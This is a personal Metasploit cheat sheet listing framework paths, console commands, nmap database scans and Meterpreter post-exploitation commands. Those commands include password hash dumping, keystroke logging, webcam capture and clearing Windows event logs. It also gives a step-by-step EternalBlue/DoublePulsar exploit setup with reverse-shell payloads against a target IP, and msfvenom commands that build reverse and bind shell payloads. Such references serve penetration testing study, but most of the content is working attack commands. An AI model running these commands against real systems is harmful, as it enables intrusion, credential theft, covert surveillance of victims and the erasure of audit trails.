Metasploit framework#
Locations:#
/usr/share/metasploit-framework/ - Root directory for Metasploit
/usr/share/metasploit-framework/documentation - Simlink to the doc of the framework
/usr/share/metasploit-framework/lib - Code base of the framework
/usr/share/metasploit-framework/plugins - Plugins for the framework
/usr/share/metasploit-framework/scripts - Meterpreter is here
/usr/share/metasploit-framework/tools - Command line utilities
/usr/share/metasploit-framework/data - Contains source and compiled files
/usr/share/metasploit-framework/modules - Modules for payloads exploits (by os) auxiliary (by service ie sql...)
/usr/share/metasploit-framework/modules/auxiliary - Sniffers, scanners, fuzzers, spoofers, etc
/usr/share/metasploit-framework/modules/encoders - Payload encoders
/usr/share/metasploit-framework/modules/evasion - Nerp?
/usr/share/metasploit-framework/modules/exploits - Software used ot attack a vulnerability and deliver a payload
/usr/share/metasploit-framework/modules/nops - Used to keep payload size consistent (by filling gaps)
/usr/share/metasploit-framework/modules/payloads - Payday bitches
/usr/share/metasploit-framework/modules/post - Additional functions that can be run on a compromised host, for persistence for instance
Usefull commands:#
msf > msfconsole - Start the console duh
msf > banner - Show another banner
msf > ? - Help menu
msf > workspace - List workspaces
msf > workspace -a [name] - Add workspace(s)
msf > workspace [name] - Switch workspace
msf > workspace -d [name] - Delete workspace(s)
msf > connect - Some sort of netcat clone
msf > edit - Vim style editor
msf > grep - Grep
msf > info - Info about a module or payload
msf > jobs - Same as in unix
msf > load - Load a module
msf > loadpath - Load a module
msf > unload - Unload a module
msf > search - With options like name / type / author / platform / cve
msf > show - Show payload / exploits / options / targets / advanced
msf > use - Use a specific exploit or tool such as a scanner
msf > set - Set a variable in current exploit
msf > setg - Set a variable globally
msf > run - Run a module
Exploitdb:#
systemctl start postgresql - Start the PostgreSQL service
msfdb init - Initialise the db for metasploit
db_status - Check the status of the db
Store nmap scans into the db#
msf > db_nmap -sn 192.168.0.0/24 - Sweep scan for local network
msf > db_nmap -A 192.168.0.178 -p 1-65535 - Scan all ports on specific host .178
msf > hosts - List discovered hosts
msf > services - List discovered services
msf > services -c name,port - Discovered services/filtered output
msf > vulns - List discovered vulnerabilities
msf > vulns -i - Display vuln information
msf > vulns -p 1-65536 -i - Display vuln for specific portrange
Meterpreter#
help - get help
lpwd - pwd on local machine (attacker)
pwd - pwd on target machine
lcd - cd on local machine (attacker)
cd - cd on target machine
edit - simple vim like text editor
getuid - get user id
sysinfo - get system info
arp - get arp cache
idletime - check for how long the system has been idle
ipconfig - windows like
ps - like lnx ps
migrate $PID - migrate to $PID
getsystem - attemp automatic privesc
background - put the meterpretter in the bg of metasploit
sessions -l - list meterpreter sessions in metasploit
sessions -i 1 - interact with meterpreter session 1
search suggester
download - download from target system (double slashes when giving a windows path) -> ex: download c:\\boot.ini
upload - upload on the target system (double slashes when giving a windows path) -> ex: download c:\\boot.ini
shell - get a standard shell from the target system
execute - runs a single command on the target
hashdump - get the hashdumps (like /etc/shadow)
keyscan_start - start a keystroke logger
keyscan_dump - get the dump from the logger
screenshot - get a screenshot of the gui if any
webcam_list - list currently available web cams on the target
webcam_snap - take a dick pick
clearev - clear system & security events on a windows system
Double Pulsar - Eternal Blue:#
install the exploit
root: mkdir -p /root/.wine/drive_c/
root: mkdir -p /root/.msf4/modules/exploits/windows/smb
root: cd /root/.msf4/modules/exploits/windows/smb
root: git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
scan vulnerable hosts
msf > workspace -a EternalBlue
msf > db_scan -sS -O -sV -vv 192.168.100.10
msf > search doublepulsar
msf > use auxiliary/scanner/smb/smb_ms17_010
msf > set RHOST 192.168.100.10
msf > run
msf > vulns
set and run the payload
msf > use exploit/windows/smb/eternalblue_doublepulsar
msf > set payload windows/meterpreter/reverse_tcp
msf > set payload windows/x64/shell/reverse_tcp
msf > show options
msf > set RHOST 192.168.100.10
msf > set PROCESSINJECT explorer.exe
msf > set TARGETARCHITECTURE x64
Msfvenom#
--platform
-p --payload
-e --encoder
-b --bad-chars
-f --format
-x --template
-l --list
msfvenom --platform windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b "0" -f python
msfvenom --platform linux -p linux/x86/shell/reverse_tcp LHOST=w.z.y.z LPORT=443 -b "0" -f elf -o file.bin
msfvenom --platform linux -t shell.elf LHOST=10.10.14.25
msfvenom -x /tmp/tmp3rgnf7lr/evil.apk -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null
Meterpreter#
linux/x86/meterpreter/reverse_tcp
linux/x64/meterpreter/reverse_tcp
windows/meterpreter/reverse_tcp
windows/x64/meterpreter/reverse_tcp
Staged#
linux/x86/shell/bind_tcp
linux/x64/shell/reverse_tcp
windows/shell/bind_tcp
windows/x64/shell/reverse_tcp
Stageless#
linux/x86/shell_bind_tcp
linux/x64/shell_reverse_tcp
windows/shell_bind_tcp
windows/x64/shell_reverse_tcp